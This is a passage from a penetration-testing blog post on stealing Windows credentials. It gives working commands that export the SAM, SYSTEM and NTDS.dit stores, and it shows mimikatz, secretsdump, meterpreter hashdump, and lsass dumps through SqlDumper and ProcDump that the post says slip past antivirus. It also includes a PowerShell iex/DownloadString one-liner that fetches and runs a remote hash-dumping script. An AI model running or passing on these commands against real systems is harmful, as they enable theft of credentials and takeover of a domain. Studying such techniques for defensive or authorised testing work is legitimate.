<h3 id="From-SAM-File"><a href="#From-SAM-File" class="headerlink" title="From SAM File"></a>From <code>SAM</code> File</h3><p>As I mentioned, <code>SAM</code> file saves password hash of the <code>Workgroup</code>, so we can extract something from it, like from <code>lsass.exe</code>. What you get is only local users’ or logged in users’ hashes.</p>
<p>Export <code>SAM</code> file data:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt; reg save HKLM\SYSTEM SYSTEM</span><br><span class="line">&gt; reg save HKLM\SAM SAM</span><br></pre></td></tr></table></figure></p>
<p>Use <code>mimikatz</code> to extract hash:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz # lsadump::sam /sam:SAM /system:SYSTEM</span><br></pre></td></tr></table></figure></p>
<h3 id="From-NTDS-dit-File"><a href="#From-NTDS-dit-File" class="headerlink" title="From NTDS.dit File"></a>From <code>NTDS.dit</code> File</h3><p>I also mentioned in <code>Domain</code>, <code>NTDS.dit</code> stores all <code>Domain Member</code> password hashes (For <code>Domain Controller</code>).</p>
<p>Export <code>NTDS.dit</code> data:<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt; ntdsutil <span class="string">"ac i ntds"</span> ifm <span class="string">"create full c:\users\tmp"</span> q q</span><br></pre></td></tr></table></figure></p>
<p>Then use <a href="https://github.com/zcgonvh/NTDSDumpEx/releases" target="_blank" rel="noopener">NTDSDumpEx</a> to extract user hashes:<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt; cd c:\users\tmp</span><br><span class="line">&gt; NTDSDumpEx -d ntds.dit -s system -o domain.txt</span><br></pre></td></tr></table></figure></p>
<p>Another util – <a href="https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/impacket/examples/secretsdump.py" target="_blank" rel="noopener">secretsdump</a> of Python library <code>impacket</code>.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt; python secretsdump.py -system SYSTEM -ntds ntds.dit local</span><br></pre></td></tr></table></figure></p>
<p>It is really powerful, can extract hashes in both <code>SAM</code> and in <code>Domain</code>.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt; python secretsdump.py user_name:password@target_ip</span><br></pre></td></tr></table></figure></p>
<h3 id="Tools-to-Capture-Hash"><a href="#Tools-to-Capture-Hash" class="headerlink" title="Tools to Capture Hash"></a>Tools to Capture Hash</h3><ul>
<li><p><code>mimikatz</code> is more than just capturing the hashes. See <a href="https://github.com/gentilkiwi/mimikatz/wiki" target="_blank" rel="noopener">Wiki</a> to find more help.</p>
</li>
<li><p>Powershell pentest framework like <code>nishang</code> usually have useful scripts to get hashes:<code>powershell iex (New-Object Net.WebClient).DownloadString(&#39;https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1&#39;);Get-PassHashes</code></p>
</li>
<li><p>As for <code>metasploit</code>, <code>meterpreter</code> has some built-in cmds:</p>
  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; hashdump</span><br><span class="line">meterpreter &gt; run post/windows/gather/hashdump</span><br><span class="line">meterpreter &gt; run hashdump</span><br><span class="line">meterpreter &gt; run post/windows/gather/smart_hashdump</span><br></pre></td></tr></table></figure>
<p>  load <code>mimikatz</code> to do more:</p>
  <figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; load mimikatz   <span class="comment"># necessary</span></span><br><span class="line">meterpreter &gt; msv</span><br><span class="line">meterpreter &gt; tspkg</span><br><span class="line">meterpreter &gt; wdigest</span><br><span class="line">meterpreter &gt; kerberos</span><br><span class="line">meterpreter &gt; ssp</span><br><span class="line">meterpreter &gt; mimikatz_command -f samdump::hashes</span><br></pre></td></tr></table></figure>
</li>
<li><p>Windows Credentials Editor (WCE) is also famous to do intranet pentest. Download <a href="https://www.ampliasecurity.com/research/wce_v1_42beta_x32.zip" target="_blank" rel="noopener">x32</a>, <a href="https://www.ampliasecurity.com/research/wce_v1_42beta_x64.zip" target="_blank" rel="noopener">x64</a> or <a href="https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip" target="_blank" rel="noopener">universal</a>.</p>
</li>
<li><p><a href="https://github.com/quarkslab/quarkspwdump" target="_blank" rel="noopener"><code>Quarks PwDump</code></a> is kind of old, which used to be a stabe hash capturer.</p>
</li>
<li><p><a href="https://docs.microsoft.com/en-us/sysinternals/downloads/procdump" target="_blank" rel="noopener"><code>ProcDump</code></a> belongs to Windows Sysnternals Suite, which belongs to Microsoft now. Therefore it is able to bypass some antivirus softwares. Working with `mimikatz is talked <a href="#Normal-Ways">before</a></p>
</li>
<li><p><code>SqlDumper.exe</code> is belong to Microsoft and exists in SQL Server directory, also capable for bypassing antivirus software.It is stored in <code>C:\Program Files\Microsoft SQL Server\number\Shared</code> by default, but if SQL Server is uninstalled, you have to upload. Use it like:</p>
  <figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&gt; tasklist /svc | findstr lsass.exe  <span class="comment"># see lsass.exe PID</span></span><br><span class="line">&gt; Sqldumper.exe ProcessID <span class="number">0</span> <span class="number">0</span>x01100  <span class="comment"># export dump hash</span></span><br><span class="line"><span class="comment"># then use mimmikatz (same OS version needed) to extract hash </span></span><br><span class="line">&gt; mimikatz.exe <span class="string">"sekurlsa::minidump SQLDmpr0001.mdmp"</span> <span class="string">"sekurlsa::logonPasswords full"</span> <span class="keyword">exit</span></span><br></pre></td></tr></table></figure></li>
</ul>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src>
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title="0" data-url="https://link.hhtjim.com/163/514216257.mp3"></li>
                        
                    
                        
                            <li title="1" data-url="https://link.hhtjim.com/163/514213582.mp3"></li>
                        
                    
                        
                            <li title="2" data-url="https://link.hhtjim.com/163/514216237.mp3"></li>
                        
                    
                        
                            <li title="3" data-url="https://link.hhtjim.com/163/36664350.mp3"></li>
                        
                    
                        
                            <li title="4" data-url="https://link.hhtjim.com/163/401722197.mp3"></li>
                        
                    
                        
                            <li title="5" data-url="https://link.hhtjim.com/163/34228815.mp3"></li>
                        
                    
                        
                            <li title="6" data-url="https://link.hhtjim.com/163/401723178.mp3"></li>
                        
                    
                </ul>
            
        </div>
        
    <div id="gitalk-container" class="comment link" data-enable="false" data-ae="false" data-ci data-cs data-r data-o data-a data-d="false">View Comments</div>


    </div>
    
        <div class="side">
			<ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Basic-Knowledge"><span class="toc-number">1.</span> <span class="toc-text">Basic Knowledge</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#NTLM-Protocol"><span class="toc-number">1.1.</span> <span class="toc-text">NTLM Protocol</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#LM-Hash"><span class="toc-number">1.1.1.</span> <span class="toc-text">LM Hash</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#NTLM-Hash"><span class="toc-number">1.1.2.</span> <span class="toc-text">NTLM Hash</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#NTLM-Authentication"><span class="toc-number">1.1.3.</span> <span class="toc-text">NTLM Authentication</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Kerberos-Protocol"><span class="toc-number">1.2.</span> <span class="toc-text">Kerberos Protocol</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Golden-Ticket"><span class="toc-number">1.3.</span> <span class="toc-text">Golden Ticket</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Mimikatz"><span class="toc-number">1.3.1.</span> <span class="toc-text">Mimikatz</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#CobaltStrike"><span class="toc-number">1.3.2.</span> <span class="toc-text">CobaltStrike</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Metasploit"><span class="toc-number">1.3.3.</span> <span class="toc-text">Metasploit</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Silver-Ticket"><span class="toc-number">1.4.</span> <span class="toc-text">Silver Ticket</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Other-Methods-to-Abuse-Kerberos"><span class="toc-number">1.5.</span> <span class="toc-text">Other Methods to Abuse Kerberos</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Pass-The-Hash"><span class="toc-number">1.6.</span> <span class="toc-text">Pass The Hash</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Capture-NTLM-Hash"><span class="toc-number">1.6.1.</span> <span class="toc-text">Capture NTLM Hash</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#PTH-Tools"><span class="toc-number">1.6.2.</span> <span class="toc-text">PTH Tools</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Pass-The-Key"><span class="toc-number">1.6.3.</span> <span class="toc-text">Pass The Key</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Pass-The-Ticket"><span class="toc-number">1.6.4.</span> <span class="toc-text">Pass The Ticket</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Related"><span class="toc-number">1.6.5.</span> <span class="toc-text">Related</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Steal-Credentials"><span class="toc-number">2.</span> <span class="toc-text">Steal Credentials</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#From-lsass-exe-Process"><span class="toc-number">2.1.</span> <span class="toc-text">From lsass.exe Process</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Normal-Ways"><span class="toc-number">2.1.1.</span> <span class="toc-text">Normal Ways</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Limited-Upload-Length"><span class="toc-number">2.1.2.</span> <span class="toc-text">Limited Upload Length</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Limited-Download-Length"><span class="toc-number">2.1.3.</span> <span class="toc-text">Limited Download Length</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#LSA-Protection"><span class="toc-number">2.1.4.</span> <span class="toc-text">LSA Protection</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Credential-Guard"><span class="toc-number">2.1.5.</span> <span class="toc-text">Credential Guard</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#From-SAM-File"><span class="toc-number">2.2.</span> <span class="toc-text">From SAM File</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#From-NTDS-dit-File"><span class="toc-number">2.3.</span> <span class="toc-text">From NTDS.dit File</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Tools-to-Capture-Hash"><span class="toc-number">2.4.</span> <span class="toc-text">Tools to Capture Hash</span></a></li></ol></li></ol>	
        </div>
    
</div>


    </div>
</div>
</body>

<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/typed.js"></script>
<script src="/js/diaspora.js"></script>
<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">
<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>






</html>
